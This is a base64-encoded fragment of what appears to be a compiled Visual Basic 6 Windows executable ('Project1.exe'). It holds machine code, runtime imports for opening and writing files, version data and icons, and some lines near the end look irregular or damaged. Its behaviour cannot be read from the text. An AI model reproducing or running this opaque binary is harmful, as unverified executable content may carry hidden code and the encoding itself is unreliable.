AAAAcBtAAHAbQABwG0AAAAAAAAAAAAAAAAAARAAAAAQAAADMzMzMzMzMzOnp6enMzMzMzMzMzMzM
zMxVi+yD7BhoBhFAAGShAAAAAFBkiSUAAAAAuKwAAADozfT//1NWV4ll6MdF7LgQQACLRQiD4AGJ
RfCLTQiD4f6JTQjHRfQAAAAAi1UIiwKLTQhR/1AEx0X8AQAAAMdF/AIAAADHRYDkGUAAx4V4
CAAAAI2VeP///41NuP8VkBBAAI1VuFKNRahQ/xUoEEAAjU2oUf8VEBBAAIvQjU3M/xWYEEAAjVWo
Uo1FuFBqAv8VFBBAAIPEDMdF/AMAAABq//8VLBBAAMdF/AQAAACLTcxRaPQZQAD/FSAQQACJRcDH
RbgIAAAAjVW4jU3Q/xUIEEAAx0X8BQAAAI1V0FL/FZwQQACL0I1NyP8VmBBAAFBqAWr/agL/FXQQ
QACNTcj/FawQQADHRfwGAAAAaDQaQABqAWhsGkAA/xVgEEAAg8QMx0X8BwAAAGoB/xVEEEAAx0X8
CAAAAMdFkAQAAoDHRYgKAAAAx0WgBAACgMdFmAoAAADHRbAEAAKAx0WoCgAAAMdFgHQaQADHhXj/
//8IAAAAjUWIUI1NmFGNVahSagCNhXj///9QjU3QUY1VuFL/FYwQQABQ/xUwEEAAjUWIUI1NmFGN
VahSjUW4UGoE/xUUEEAAg8QUx0XwAAAAAGguHkAA6yWNTcj/FawQQACNTYhRjVWYUo1FqFCNTbhR
agT/FRQQQACDxBTDjU3Q/xUMEEAAjU3M/xWsEEAAw4tVCIsCi00IUf9QCItF8ItN4GSJDQAAAABf
XluL5V3CBACenp6efB4AAP//MB8AAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD4fAABI
HwAAVh8AAGYfAAB2HwAAiB8AAJwfAACsHwAAuh8AAMgfAACaAgCA2B8AAFMCAIDoHwAA+h8AAAwg
AAAWIAAAJCAAADYgAABKIAAAWCAAAG4gAAB4IAAAlCAAAKogAAC8IAAAyiAAANwgAADwIAAA+iAA
AAohAAAcIQAALiEAAEAhAABkAACATiEAAFwhAABqIQAAdCEAAIQhAACWIQAAoCEAAKohAAC0IQAA
AAAAAE1TVkJWTTYwLkRMTAAAAABfQ0ljb3MAAAAAX2Fkal9mcHRhbgAAAABfX3ZiYVZhck1vdmUA
AAAAX192YmFGcmVlVmFyAAAAAF9fdmJhU3RyVmFyTW92ZQAAAF9fdmJhRnJlZVZhckxpc3QAAAAA
X2Fkal9mZGl2X202NAAAAF9hZGpfZnByZW0xAAAAX192YmFTdHJDYXQAAABfYWRqX2ZkaXZfbTMy
AAAAX192YmFPbkVycm9yAAAAAF9hZGpfZmRpdl9tMTZpAAAAAF9hZGpfZmRpdnJfbTE2aQAAAF9D
SXNpbgAAAABfX3ZiYUNoa3N0awAAAF9fdmJhRmlsZUNsb3NlAAAAAEVWRU5UX1NJTktfQWRkUmVm
AAAAX2Fkal9mcGF0YW4AAABFVkVOVF9TSU5LX1JlbGVhc2UAAAAAX0NJc3FydAAAAEVWRU5UX1NJ
TktfUXVlcnlJbnRlcmZhY2UAAABfX3ZiYUV4Y2VwdEhhbmRsZXIAAAAAX192YmFQcmludEZpbGUA
AAAAX2Fkal9mcHJlbQAAAABfYWRqX2ZkaXZyX202NAAAAABfX3ZiYUZQRXhjZXB0aW9uAAAAAF9D
SWxvZwAAAABfX3ZiYUZpbGVPcGVuAAAAX2Fkal9mZGl2X20zMmkAAAAAX2Fkal9mZGl2cl9tMzJp
AAAAX2Fkal9mZGl2cl9tMzIAAAAAX2Fkal9mZGl2X3IAAABfX3ZiYVZhckFkZAAAAF9fdmJhVmFy
RHVwAAAAX0NJYXRhbgAAAF9fdmJhU3RyTW92ZQAAAABfX3ZiYVN0clZhckNvcHkAAABfYWxsbXVs
AAAAX0NJdGFuAAAAAF9DSWV4cAAAAABfX3ZiYUZyZWVTdHIAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADP9Is6AAAAAAAAAwADAAAAWAAAgA4AAABAAACA
EAAAACgAAIAAAAAAz/SLOgAAAAAAAAEAAQAAAIAAAIAAAAAAz/SLOgAAAAAAAAEAAQAAAJgAAIAA
AAAAz/SLOgAAAAAAAAMAMXUAAOAAAIAydQAAyAAAgDN1AACwAACAAAAAAM/0izoAAAAAAAABAAkE
AAD4AAAAAAAAAM/0izoAAAAAAAABAAAAAAAIAQAAAAAAAM/0izoAAAAAAAABAAAAAAAYAQAAAAAA
AM/0izoAAAAAAAABAAAAAAAoAQAAAAAAAM/0izoAAAAAAAABAAAAAAA4AQAAUEEAAOQBAACwBAAA
AAAAADRDAAAwAAAAsAQAAAAAAABkQwAAKAEAALAEAAAAAAAAjEQAAOgCAACwBAAAAAAAAHRHAAAw
AQAAsAQAAAAAAAAAAAAAAAAAAOQBNAAAAFYAUwBfAFYARQBSAFMASQBPAE4AXwBJAE4ARgBPAAAA
AAC9BO/+AAABAAAAAQAAAAAAAAABAAAAAAAAAAAAAAAAAAQAAAABAAAAAAAAAAAAAAAAAAAARAAA
AAAAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABUAHIAYQBuAHMAbABhAHQAaQBvAG4A
AAAAAAkEsAREAQAAAQBTAHQAcgBpAG4AZwBGAGkAbABlAEkAbgBmAG8AAAAgAQAAAQAwADQAMAA5
ADAANABCADAAAAA0ABIAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAFAAcgBvAGoAZQBjAHQA
MQAAAAAALAAKAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAxAC4AMAAwAAAAAAAwAAoAAQBQ
AHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAxAC4AMAAwAAAAAAA0ABIAAQBJAG4AdABlAHIA
bgBhAGwATgBhAG0AZQAAAFAAcgBvAGoAZQBjAHQAMQAAAAAARAAaAAEATwByAGkAZwBpAG4AYQBs
AEYAaQBsAGUAbgBhAG0AZQAAAFAAcgBvAGoAZQBjAHQAMQAuAGUAeABlAAAAAAAAAAEAAwAgIAIA
AQABADABAAAxdSAgEAABAAQA6AIAADJ1EBAQAAEABAAoAQAAM3UoAAAAEAAAACAAAAABAAQAAAAA
AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAgAAAAICAAIAAAACAAIAAgIAAAICAgADAwMAA
AAD/AAD/AAAA//8A/wAAAP8A/wD//wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAI
8HcAAAAI///wd3AAD/BwAAAP8AAAAA/wAAAAD///gAAAAAAPgAAO4AAAAAAO7uAA
AAAADuAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//8AAP//AAD/jwAA+AMA
AMABAADABwAAwA8AAMAPAADADwAAwA8AAMAPAADAfwAAx/8AAP//AAD//wAA//8AACgAAAAgAAAA
QAAAAAEABAAAAAAAgAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAACAAAAAgIAAgAAAAIAAgACA
gAAAgICAAMDAwAAAAP8AAP8AAAD//wD/AAAA/wD/AP//AAD///8AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAj/8HcAAAAAAAAAAAAACPB3dwAAAAAAAA
CP///wd3d3AAAAAA//8Hd3AAAAAAAP//B3AAAAAAAAD//wAA
AAAAAAAA//8AAAAAAAAAAP//AAAAAAAAAAD//wAAAAAAAAAA
//8AAAAAAAAAAP//AAAAAAAAAAD//wAAAAAAAAAAiIgAAAAA
AAAAAP+IiAAAAAAAAAAAAAD//4iIAADu7gAAAAAAAAAAiIgAAO7uAAAAAAAAAAAAAAAA7u4A
AAAAAAAAAAAAAADu7gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/
wf///AB//4AAH/gAAAf4AAAf+AAAf/gAAf/4AAH/+AAB//gAAf/4AAH/+AAB//gAAf/4AAH/
+AAB//gAAf/4AAH/+AA///gD///4P///+ygAAAAg
AAAAQAAAAAEAAQAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP//
///B///8PH//w/wf+D/8B/v//B/7//x/+//9//v//f/7//3/+//9//v//f/7//3/+//9
//v//f/7/8H/+/w9//vDwf/4PD//+8P///g7
/8H///wAf//AAB/4AAAH+AAAH/gAAH/4AAH/+AAB//gAAf/4
AAH/+AAB//gAAf/4AAH/+AAB//gAAf/4AAH/+AAB//gAP//4A///+Dv/
